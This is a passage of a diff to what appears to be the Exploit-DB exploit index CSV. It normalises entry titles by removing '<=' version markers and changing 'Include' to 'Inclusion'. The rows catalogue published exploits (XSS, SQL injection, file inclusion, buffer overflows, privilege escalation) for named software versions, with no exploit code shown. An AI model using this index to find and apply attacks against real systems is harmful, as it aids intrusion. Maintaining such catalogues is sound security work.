iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0 30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0 -30216,platforms/cfm/webapps/30216.txt,"FuseTalk <= 4.0 - AuthError.CFM Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0 -30217,platforms/php/webapps/30217.txt,"Wrapper.php for OsCommerce Local File Include",2007-06-20,"Joe Bloomquist",php,webapps,0 +30216,platforms/cfm/webapps/30216.txt,"FuseTalk 4.0 - AuthError.CFM Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0 +30217,platforms/php/webapps/30217.txt,"Wrapper.php for OsCommerce Local File Inclusion",2007-06-20,"Joe Bloomquist",php,webapps,0 30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 Parse Error Information Disclosure",2007-06-20,Prili,multiple,remote,0 30219,platforms/multiple/remote/30219.txt,"MyServer 0.8.9 Filename Parse Error Information Disclosure",2007-06-21,"Shay Priel",multiple,remote,0 -30220,platforms/php/webapps/30220.txt,"PHPAccounts 0.5 Index.php Local File Include",2007-06-21,r0t,php,webapps,0 +30220,platforms/php/webapps/30220.txt,"PHPAccounts 0.5 Index.php Local File Inclusion",2007-06-21,r0t,php,webapps,0 30221,platforms/php/webapps/30221.txt,"PHPAccounts 0.5 Index.php Multiple SQL Injection Vulnerabilities",2007-06-21,r0t,php,webapps,0 30222,platforms/multiple/remote/30222.txt,"MyServer 0.9.8 Post.MSCGI Cross-Site Scripting",2007-01-02,Prili,multiple,remote,0 -30223,platforms/php/webapps/30223.txt,"NetClassifieds <= 1.9.7 - Multiple Input Validation Vulnerabilities",2007-06-21,"laurent gaffie",php,webapps,0 +30223,platforms/php/webapps/30223.txt,"NetClassifieds 1.9.7 - Multiple Input Validation Vulnerabilities",2007-06-21,"laurent gaffie",php,webapps,0 30224,platforms/windows/dos/30224.py,"Ingress Database Server 2.6 - Multiple Remote Vulnerabilities",2007-06-21,anonymous,windows,dos,0 30225,platforms/php/webapps/30225.txt,"eNdonesia 8.4 mod.php viewarticle Action artid Parameter SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0 30226,platforms/php/webapps/30226.txt,"eNdonesia 8.4 banners.php click Action bid Parameter SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0 -30227,platforms/php/webapps/30227.txt,"Joomla/Mambo Mod_Forum Component PHPBB_Root.php Remote File Include",2007-06-22,spymeta,php,webapps,0 +30227,platforms/php/webapps/30227.txt,"Joomla/Mambo Mod_Forum Component PHPBB_Root.php Remote File Inclusion",2007-06-22,spymeta,php,webapps,0 30228,platforms/osx/remote/30228.txt,"Apple WebCore XMLHTTPRequest Cross-Site Scripting",2007-06-22,"Richard Moore",osx,remote,0 30229,platforms/multiple/remote/30229.txt,"SHTTPD 1.38 Filename Parse Error Information Disclosure",2007-06-25,"Shay Priel",multiple,remote,0 30230,platforms/php/webapps/30230.txt,"MyNews 0.10 - AuthACC SQL Injection",2007-06-25,netVigilance,php,webapps,0 @@ -27177,20 +27177,20 @@ id,file,description,date,author,platform,type,port 30248,platforms/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,hardware,webapps,0 30249,platforms/php/webapps/30249.txt,"Papoo 1.0.3 Plugin.php Authentication Bypass",2007-06-27,"Nico Leidecker",php,webapps,0 30250,platforms/asp/webapps/30250.txt,"DUClassmate 1.x ICity Parameter SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps,0 -30251,platforms/linux/dos/30251.c,"GD Graphics Library <= 2.0.34 - (libgd) gdImageCreateXbm Function Unspecified DoS",2007-06-26,anonymous,linux,dos,0 +30251,platforms/linux/dos/30251.c,"GD Graphics Library 2.0.34 - (libgd) gdImageCreateXbm Function Unspecified DoS",2007-06-26,anonymous,linux,dos,0 30252,platforms/windows/dos/30252.py,"Conti FTP Server 1.0 Large String Denial of Service",2007-06-27,35c666,windows,dos,0 30253,platforms/php/webapps/30253.txt,"ETicket 1.5.5 Open.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-27,"Jesper Jurcenoks",php,webapps,0 30254,platforms/hardware/remote/30254.txt,"Linksys Wireless-G ADSL Gateway WAG54GS 1.0.6 Setup.CGI Cross-Site Scripting Vulnerabilities",2007-06-27,"Petko Petkov",hardware,remote,0 30255,platforms/windows/dos/30255.txt,"PC SOFT WinDEV 11 - WDP File Parsing Stack Buffer Overflow",2007-06-28,"Jerome Athias",windows,dos,0 30256,platforms/multiple/remote/30256.txt,"Oracle Rapid Install Web Server Secondary Login Page Cross-Site Scripting",2007-06-28,"Kaushal Desai",multiple,remote,0 30257,platforms/windows/remote/30257.html,"HP Instant Support ActiveX Control Driver Check Buffer Overflow",2007-04-01,"John Heasman",windows,remote,0 -30258,platforms/php/webapps/30258.txt,"LightBlog <= 5 Add_Comment.php Cross-Site Scripting",2007-07-02,Serapis.net,php,webapps,0 -30259,platforms/php/webapps/30259.txt,"Claroline <= 1.8.3 - $_SERVER['PHP_SELF'] Parameter Multiple Cross-Site Scripting Vulnerabilities",2007-07-02,munozferna,php,webapps,0 +30258,platforms/php/webapps/30258.txt,"LightBlog 5 Add_Comment.php Cross-Site Scripting",2007-07-02,Serapis.net,php,webapps,0 +30259,platforms/php/webapps/30259.txt,"Claroline 1.8.3 - $_SERVER['PHP_SELF'] Parameter Multiple Cross-Site Scripting Vulnerabilities",2007-07-02,munozferna,php,webapps,0 30260,platforms/cgi/webapps/30260.txt,"Yoggie Pico and Pico Pro Backticks - Remote Code Execution",2007-07-02,"Cody Brocious",cgi,webapps,0 30261,platforms/php/webapps/30261.txt,"Moodle 1.7.1 Index.php Cross-Site Scripting",2007-07-02,MustLive,php,webapps,0 30262,platforms/php/webapps/30262.txt,"Liesbeth Base CMS Information Disclosure",2007-07-02,durito,php,webapps,0 30263,platforms/cgi/webapps/30263.txt,"Oliver Multiple Cross-Site Scripting Vulnerabilities",2007-07-03,"A. R.",cgi,webapps,0 -30264,platforms/multiple/remote/30264.txt,"Fujitsu ServerView <= 4.50.8 DBASCIIAccess Remote Command Execution",2007-07-03,"RedTeam Pentesting GmbH",multiple,remote,0 +30264,platforms/multiple/remote/30264.txt,"Fujitsu ServerView 4.50.8 DBASCIIAccess Remote Command Execution",2007-07-03,"RedTeam Pentesting GmbH",multiple,remote,0 30265,platforms/multiple/remote/30265.txt,"SAP Message Server Group Parameter Remote Buffer Overflow",2007-07-05,"Mark Litchfield",multiple,remote,0 30266,platforms/jsp/webapps/30266.txt,"NetFlow Analyzer 5 - /jspui/applicationList.jsp alpha Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 30267,platforms/jsp/webapps/30267.txt,"NetFlow Analyzer 5 - /jspui/appConfig.jsp task Parameter XSS",2007-07-04,Lostmon,jsp,webapps,0 @@ -27202,20 +27202,20 @@ id,file,description,date,author,platform,type,port 30273,platforms/java/webapps/30273.txt,"OpManager 6/7 reports/ReportViewAction.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0 30274,platforms/java/webapps/30274.txt,"OpManager 6/7 admin/ServiceConfiguration.do operation Parameter XSS",2007-07-04,Lostmon,java,webapps,0 30275,platforms/java/webapps/30275.txt,"OpManager 6/7 admin/DeviceAssociation.do Multiple Parameter XSS",2007-07-04,Lostmon,java,webapps,0 -30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 Login.php Multiple Local File Include Vulnerabilities",2007-07-05,"Adriel T. Desautels",php,webapps,0 +30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 Login.php Multiple Local File Inclusion Vulnerabilities",2007-07-05,"Adriel T. Desautels",php,webapps,0 30278,platforms/windows/remote/30278.c,"SAP DB 7.x Web Server WAHTTP.EXE Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0 -30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server <= 7.0 PARAms Cross-Site Scripting",2007-07-05,"Mark Litchfield",multiple,remote,0 +30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server 7.0 PARAms Cross-Site Scripting",2007-07-05,"Mark Litchfield",multiple,remote,0 30280,platforms/linux/local/30280.txt,"GFax 0.7.6 Temporary Files Local Arbitrary Command Execution",2007-07-05,"Steve Kemp",linux,local,0 -30281,platforms/windows/remote/30281.txt,"Microsoft .Net Framework <= 2.0 - Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",windows,remote,0 +30281,platforms/windows/remote/30281.txt,"Microsoft .Net Framework 2.0 - Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",windows,remote,0 30282,platforms/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 Oku.ASP SQL Injection",2007-07-07,GeFORC3,asp,webapps,0 30285,platforms/linux/remote/30285.txt,"Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection",2007-07-10,"Thor Larholm",linux,remote,0 -30286,platforms/linux/remote/30286.txt,"ImgSvr 0.6 Template Parameter Local File Include",2007-07-10,"Tim Brown",linux,remote,0 +30286,platforms/linux/remote/30286.txt,"ImgSvr 0.6 Template Parameter Local File Inclusion",2007-07-10,"Tim Brown",linux,remote,0 30287,platforms/windows/remote/30287.txt,"TippingPoint IPS Unicode Character Detection Bypass",2007-07-10,Security-Assessment.com,windows,remote,0 -30288,platforms/multiple/remote/30288.txt,"Adobe Flash Player <= 8.0.24 - SWF File Handling Remote Code Execution",2007-07-10,"Stefano DiPaola",multiple,remote,0 +30288,platforms/multiple/remote/30288.txt,"Adobe Flash Player 8.0.24 - SWF File Handling Remote Code Execution",2007-07-10,"Stefano DiPaola",multiple,remote,0 30289,platforms/asp/webapps/30289.txt,"EnViVo!CMS Default.ASP ID Parameter SQL Injection",2007-07-11,durito,asp,webapps,0 30290,platforms/php/webapps/30290.txt,"IBM Proventia Sensor Appliance Multiple Input Validation Vulnerabilities",2007-07-11,"Alex Hernandez",php,webapps,0 30291,platforms/linux/remote/30291.txt,"Multiple Vendors - RAR Handling Remote Null Pointer Dereference",2007-07-11,"Metaeye Security Group",linux,remote,0 -30292,platforms/multiple/remote/30292.pl,"Apple QuickTime <= 7.1.5 Information Disclosure and Multiple Code Execution Vulnerabilities",2007-07-11,Wolf,multiple,remote,0 +30292,platforms/multiple/remote/30292.pl,"Apple QuickTime 7.1.5 Information Disclosure and Multiple Code Execution Vulnerabilities",2007-07-11,Wolf,multiple,remote,0 30293,platforms/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",php,webapps,0 30294,platforms/php/webapps/30294.txt,"Inmostore 4.0 Index.php SQL Injection",2007-07-12,Keniobats,php,webapps,0 30295,platforms/multiple/local/30295.sql,"Oracle Database SQL Compiler Views Unauthorized Manipulation",2007-07-12,bunker,multiple,local,0 @@ -27236,7 +27236,7 @@ id,file,description,date,author,platform,type,port 30388,platforms/php/webapps/30388.txt,"Vikingboard Viking board 0.1.2 cp.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0 30389,platforms/php/webapps/30389.txt,"iFoto 1.0 Index.php Directory Traversal",2007-07-25,Lostmon,php,webapps,0 30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 UserName Parameter SQL Injection",2007-07-26,"Aria-Security Team",php,webapps,0 -30391,platforms/php/webapps/30391.txt,"PhpHostBot 1.05 - Authorize.php Remote File Include",2007-07-26,S4M3K,php,webapps,0 +30391,platforms/php/webapps/30391.txt,"PhpHostBot 1.05 - Authorize.php Remote File Inclusion",2007-07-26,S4M3K,php,webapps,0 30392,platforms/windows/local/30392.rb,"Microsoft Windows ndproxy.sys - Local Privilege Escalation",2013-12-17,Metasploit,windows,local,0 30308,platforms/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - DoS (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,dos,0 30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0 @@ -27244,7 +27244,7 @@ id,file,description,date,author,platform,type,port 30311,platforms/ios/webapps/30311.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-15,Vulnerability-Lab,ios,webapps,0 30312,platforms/php/webapps/30312.txt,"Citadel WebCit 7.02/7.10 showuser who Parameter XSS",2007-07-14,"Christopher Schwardt",php,webapps,0 30313,platforms/asp/webapps/30313.txt,"TBDev.NET DR TakeProfEdit.php HTML Injection",2007-07-16,PescaoDeth,asp,webapps,0 -30314,platforms/windows/dos/30314.txt,"Yahoo! Messenger <= 8.1 Address Book Remote Buffer Overflow Vulnerabilitiy",2007-07-16,"Rajesh Sethumadhavan",windows,dos,0 +30314,platforms/windows/dos/30314.txt,"Yahoo! Messenger 8.1 - Address Book Remote Buffer Overflow",2007-07-16,"Rajesh Sethumadhavan",windows,dos,0 30315,platforms/windows/remote/30315.txt,"Trillian 3.1.6.0 URI Handler Remote Code Execution Vulnerabilities",2007-07-16,"Nate Mcfeters",windows,remote,0 30316,platforms/asp/webapps/30316.txt,"husrevforum 1.0.1/2.0.1 Philboard_forum.ASP SQL Injection",2007-07-17,GeFORC3,asp,webapps,0 30317,platforms/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 index.php current_subsection Parameter SQL Injection",2007-07-17,joseph.giron13,php,webapps,0 @@ -27252,17 +27252,17 @@ id,file,description,date,author,platform,type,port 30319,platforms/linux/remote/30319.c,"tcpdump Print-bgp.C Remote Integer Underflow",2007-03-01,mu-b,linux,remote,0 30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 deletecomment.php id Variable Remote Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 deleteblog.php id Variable Remote Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 -30322,platforms/windows/remote/30322.rb,"Lighttpd <= 1.4.15 - Multiple Code Execution + Denial of Service + Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0 +30322,platforms/windows/remote/30322.rb,"Lighttpd 1.4.15 - Multiple Code Execution + Denial of Service + Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0 30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 install/upgrade-0-2-3.php PHP_SELF Parameter XSS",2007-07-20,s4mi,php,webapps,0 30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 install/upgrade-0-3.php PHP_SELF Parameter XSS",2007-07-20,s4mi,php,webapps,0 -30978,platforms/php/webapps/30978.txt,"WordPress <= 2.2.3 - wp-admin/page-new.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 +30978,platforms/php/webapps/30978.txt,"WordPress 2.2.3 - wp-admin/page-new.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30327,platforms/asp/webapps/30327.html,"Dora Emlak 1.0 Script Multiple Input Validation Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30328,platforms/asp/webapps/30328.txt,"Alisveris Sitesi Scripti Index.ASP SQL Injection Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30329,platforms/php/webapps/30329.sh,"Gitlab 6.0 - Persistent XSS",2013-12-16,hellok,php,webapps,0 30330,platforms/asp/webapps/30330.txt,"Alisveris Sitesi Scripti Index.ASP Cross-Site Scripting",2007-07-23,GeFORC3,asp,webapps,0 30331,platforms/asp/webapps/30331.html,"ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30332,platforms/asp/webapps/30332.txt,"Image Racer SearchResults.ASP SQL Injection",2007-07-23,"Aria-Security Team",asp,webapps,0 -30333,platforms/php/webapps/30333.txt,"PHMe 0.0.2 Function_List.php Local File Include",2007-07-23,You_You,php,webapps,0 +30333,platforms/php/webapps/30333.txt,"PHMe 0.0.2 Function_List.php Local File Inclusion",2007-07-23,You_You,php,webapps,0 30382,platforms/asp/webapps/30382.txt,"W1L3D4 Philboard 0.3 W1L3D4_Aramasonuc.ASP Cross-Site Scripting",2007-07-25,GeFORC3,asp,webapps,0 30378,platforms/php/webapps/30378.txt,"Webbler CMS 3.1.3 Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps,0 30379,platforms/php/webapps/30379.html,"Webbler CMS 3.1.3 Mail A Friend Open Email Relay",2007-07-24,"Adrian Pastor",php,webapps,0 @@ -27279,7 +27279,7 @@ id,file,description,date,author,platform,type,port 30792,platforms/php/webapps/30792.html,"Underground CMS 1.x Search.Cache.Inc.php Backdoor",2007-11-21,D4m14n,php,webapps,0 30356,platforms/php/webapps/30356.txt,"Wallpaper Script 3.5.0082 - Stored XSS",2013-12-16,"null pointer",php,webapps,0 30415,platforms/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",hardware,webapps,0 -30357,platforms/php/webapps/30357.txt,"iScripts MultiCart <= 2.4 - Persistent XSS / CSRF / XSS+CSRF Mass Accounts takeover",2013-12-16,"Saadi Siddiqui",php,webapps,0 +30357,platforms/php/webapps/30357.txt,"iScripts MultiCart 2.4 - Persistent XSS / CSRF / XSS+CSRF Mass Accounts takeover",2013-12-16,"Saadi Siddiqui",php,webapps,0 30374,platforms/windows/local/30374.txt,"QuickHeal AntiVirus 7.0.0.1 - Stack Overflow",2013-12-17,"Arash Allebrahim",windows,local,0 30361,platforms/hardware/webapps/30361.txt,"Beetel TC1-450 Airtel Wireless Router - Multiple CSRF Vulnerabilities",2013-12-16,"Samandeep Singh",hardware,webapps,0 30362,platforms/hardware/webapps/30362.txt,"Cisco EPC3925 - Cross-Site Request Forgery",2013-12-16,"Jeroen - IT Nerdbox",hardware,webapps,0 @@ -27321,7 +27321,7 @@ id,file,description,date,author,platform,type,port 30427,platforms/asp/webapps/30427.txt,"Pay Roll Time Sheet and Punch Card Application With Web UI Login.ASP SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 30428,platforms/asp/webapps/30428.txt,"Real Estate Listing Website Application Template Login Dialog SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 30429,platforms/php/webapps/30429.txt,"phpCoupon Remote Payment Bypass",2007-07-28,freeprotect.net,php,webapps,0 -30430,platforms/linux/dos/30430.txt,"Fail2ban <= 0.8 - Remote Denial of Service",2007-07-28,"Daniel B. Cid",linux,dos,0 +30430,platforms/linux/dos/30430.txt,"Fail2ban 0.8 - Remote Denial of Service",2007-07-28,"Daniel B. Cid",linux,dos,0 30431,platforms/windows/remote/30431.html,"Baidu Soba Search Bar 5.4 BaiduBar.DLL ActiveX Control Remote Code Execution",2007-07-29,cocoruder,windows,remote,0 30432,platforms/novell/remote/30432.txt,"Novell GroupWise 6.5 WebAccess User.Id Parameter Cross-Site Scripting",2007-07-30,0x000000,novell,remote,0 30433,platforms/php/webapps/30433.txt,"IT!CMS 0.2 lang-en.php wndtitle Parameter XSS",2007-07-30,"Aria-Security Team",php,webapps,0 @@ -27331,19 +27331,19 @@ id,file,description,date,author,platform,type,port 30437,platforms/php/webapps/30437.txt,"Global Centre Aplomb Poll 1.1 vote.php Madoa Parameter Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 30438,platforms/php/webapps/30438.txt,"Global Centre Aplomb Poll 1.1 admin.php Madoa Parameter Remote File Inclusion",2007-07-30,"ilker Kandemir",php,webapps,0 30439,platforms/linux/remote/30439.txt,"Mozilla Firefox/Thunderbird/SeaMonkey Chrome-Loaded About:Blank Script Execution",2007-07-31,moz_bug_r_a4,linux,remote,0 -30440,platforms/cgi/webapps/30440.txt,"WebEvent <= 4.03 Webevent.CGI Cross-Site Scripting",2007-07-31,d3hydr8,cgi,webapps,0 +30440,platforms/cgi/webapps/30440.txt,"WebEvent 4.03 Webevent.CGI Cross-Site Scripting",2007-07-31,d3hydr8,cgi,webapps,0 30441,platforms/windows/remote/30441.html,"BlueSkyChat ActiveX Control 8.1.2 - Buffer Overflow",2007-07-31,"Code Audit Labs",windows,remote,0 30442,platforms/php/webapps/30442.txt,"WebDirector Index.php Cross-Site Scripting",2007-08-01,r0t,php,webapps,0 30443,platforms/php/webapps/30443.txt,"WordPress Persuasion Theme 2.x - Arbitrary File Download and File Deletion Exploit",2013-12-23,"Interference Security",php,webapps,80 -30444,platforms/linux/dos/30444.txt,"KDE Konqueror <= 3.5.7 Assert Denial of Service",2007-03-05,"Thomas Waldegger",linux,dos,0 -30445,platforms/php/webapps/30445.txt,"Joomla Tour de France Pool 1.0.1 Module mosConfig_absolute_path Remote File Include",2007-08-02,Yollubunlar.Org,php,webapps,0 +30444,platforms/linux/dos/30444.txt,"KDE Konqueror 3.5.7 Assert Denial of Service",2007-03-05,"Thomas Waldegger",linux,dos,0 +30445,platforms/php/webapps/30445.txt,"Joomla Tour de France Pool 1.0.1 Module mosConfig_absolute_path Remote File Inclusion",2007-08-02,Yollubunlar.Org,php,webapps,0 30446,platforms/asp/webapps/30446.txt,"Hunkaray Okul Portali 1.1 Duyuruoku.ASP SQL Injection",2007-08-02,Yollubunlar.Org,asp,webapps,0 30447,platforms/windows/remote/30447.html,"Tor 0.1.2.15 ControlPort Missing Authentication Unauthorized Access",2007-08-02,anonymous,windows,remote,0 30448,platforms/php/webapps/30448.txt,"LANAI CMS 1.2.14 FAQ Module mid Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 30449,platforms/php/webapps/30449.txt,"LANAI CMS 1.2.14 EZSHOPINGCART Module cid Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 30450,platforms/php/webapps/30450.txt,"LANAI CMS 1.2.14 GALLERY Module - gid Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 30451,platforms/asp/webapps/30451.txt,"Next Gen Portfolio Manager Default.ASP Multiple SQL Injection Vulnerabilities",2007-08-03,"Aria-Security Team",asp,webapps,0 -30452,platforms/php/webapps/30452.txt,"J! Reactions 1.8.1 comPath Remote File Include",2007-08-04,Yollubunlar.Org,php,webapps,0 +30452,platforms/php/webapps/30452.txt,"J! Reactions 1.8.1 comPath Remote File Inclusion",2007-08-04,Yollubunlar.Org,php,webapps,0 30453,platforms/php/webapps/30453.txt,"snif 1.5.2 Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-08-06,r0t,php,webapps,0 30454,platforms/linux/remote/30454.txt,"BlueCat Networks Adonis 5.0.2.8 - TFTP Remote Privilege Escalation",2007-08-06,defaultroute,linux,remote,0 30455,platforms/windows/dos/30455.txt,"Microsoft Internet Explorer 6.0 Position:Relative Denial of Service",2007-08-07,Hamachiya2,windows,dos,0 @@ -27353,10 +27353,10 @@ id,file,description,date,author,platform,type,port 30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 Password Parameter SQL Injection",2007-11-26,JosS,php,webapps,0 30459,platforms/php/webapps/30459.txt,"VietPHP index.php language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 30462,platforms/windows/dos/30462.py,"Microsoft Windows Media Player 11 - AU Divide-By-Zero Denial of Service",2007-08-08,"A.Sawan and nophie",windows,dos,0 -30463,platforms/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 YABBSE.INC.php Remote File Include",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps,0 +30463,platforms/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 YABBSE.INC.php Remote File Inclusion",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps,0 30900,platforms/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution Exploit",2014-01-14,"Arash Abedian",hardware,webapps,80 30464,platforms/linux/local/30464.c,"Generic Software Wrappers Toolkit 1.6.3 (GSWTK) - Race Condition Local Privilege Escalation",2007-08-09,"Robert N. M. Watson",linux,local,0 -30465,platforms/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 Index.php Remote File Include",2007-08-09,Rizgar,php,webapps,0 +30465,platforms/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 Index.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 - index.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30467,platforms/php/webapps/30467.txt,"File Uploader 1.1 - datei.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30468,platforms/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - (.rmp) Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",windows,local,0 @@ -27370,38 +27370,38 @@ id,file,description,date,author,platform,type,port 30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80 30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Local Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0 30478,platforms/php/webapps/30478.txt,"php MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,"cr4wl3r ",php,webapps,80 -30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 Shoutbox.php Remote File Include",2007-08-09,Rizgar,php,webapps,0 -30480,platforms/php/webapps/30480.txt,"Bilder Galerie 1.0 Index.php Remote File Include",2007-08-09,Rizgar,php,webapps,0 +30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 Shoutbox.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 +30480,platforms/php/webapps/30480.txt,"Bilder Galerie 1.0 Index.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30481,platforms/php/webapps/30481.txt,"Web News 1.1 - index.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30482,platforms/php/webapps/30482.txt,"Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30483,platforms/php/webapps/30483.txt,"Web News 1.1 - news.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30484,platforms/bsd/local/30484.c,"Systrace Multiple System Call Wrappers Concurrency Vulnerabilities",2007-08-09,"Robert N. M. Watson",bsd,local,0 30485,platforms/hardware/remote/30485.html,"ZyXEL ZyWALL 2 3.62 Forms/General_1 sysSystemName Parameter XSS",2007-08-10,"Henri Lindberg",hardware,remote,0 -30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 My_Statistics.php Remote File Include",2007-08-11,"ilker Kandemir",php,webapps,0 +30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 My_Statistics.php Remote File Inclusion",2007-08-11,"ilker Kandemir",php,webapps,0 30487,platforms/php/webapps/30487.txt,"Php-Stats 0.1.9.2 - WhoIs.php Cross-Site Scripting",2007-08-11,vasodipandora,php,webapps,0 -30488,platforms/php/webapps/30488.php,"Haudenschilt Family Connections <= 0.8 Index.php Authentication Bypass",2007-08-11,"ilker Kandemir",php,webapps,0 -30489,platforms/php/webapps/30489.txt,"Openads (phpAdsNew) <=c 2.0.8 - 'lib-remotehost.inc.php' Remote File Include",2007-08-11,Ma$tEr-0F-De$a$t0r,php,webapps,0 +30488,platforms/php/webapps/30488.php,"Haudenschilt Family Connections 0.8 Index.php Authentication Bypass",2007-08-11,"ilker Kandemir",php,webapps,0 +30489,platforms/php/webapps/30489.txt,"Openads (phpAdsNew) <=c 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion",2007-08-11,Ma$tEr-0F-De$a$t0r,php,webapps,0 30490,platforms/windows/remote/30490.txt,"Microsoft Internet Explorer 5.0.1 TBLinf32.DLL ActiveX Control Remote Code Execution",2007-05-08,"Brett Moore",windows,remote,0 30491,platforms/multiple/remote/30491.java,"OWASP Stinger Filter Bypass Weakness",2007-08-13,"Meder Kydyraliev",multiple,remote,0 30492,platforms/php/webapps/30492.txt,"SkilMatch Systems JobLister3 Index.php SQL Injection",2007-07-13,joseph.giron13,php,webapps,0 -30493,platforms/windows/remote/30493.js,"Microsoft XML Core Services <= 6.0 SubstringData Integer Overflow",2007-08-14,anonymous,windows,remote,0 +30493,platforms/windows/remote/30493.js,"Microsoft XML Core Services 6.0 SubstringData Integer Overflow",2007-08-14,anonymous,windows,remote,0 30494,platforms/windows/dos/30494.html,"Microsoft Internet Explorer 5.0.1 Vector Markup Language VGX.DLL Remote Buffer Overflow",2007-08-14,"Ben Nagy and Derek Soeder",windows,dos,0 -30495,platforms/multiple/remote/30495.html,"Apache Tomcat <= 6.0.13 Host Manager Servlet Cross-Site Scripting",2007-08-14,"NTT OSS CENTER",multiple,remote,0 -30496,platforms/multiple/remote/30496.txt,"Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure",2007-08-14,"Tomasz Kuczynski",multiple,remote,0 +30495,platforms/multiple/remote/30495.html,"Apache Tomcat 6.0.13 Host Manager Servlet Cross-Site Scripting",2007-08-14,"NTT OSS CENTER",multiple,remote,0 +30496,platforms/multiple/remote/30496.txt,"Apache Tomcat 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure",2007-08-14,"Tomasz Kuczynski",multiple,remote,0 30497,platforms/multiple/dos/30497.c,"Zoidcom 0.6.x Malformed Packet Denial of Service",2007-08-14,"Luigi Auriemma",multiple,dos,0 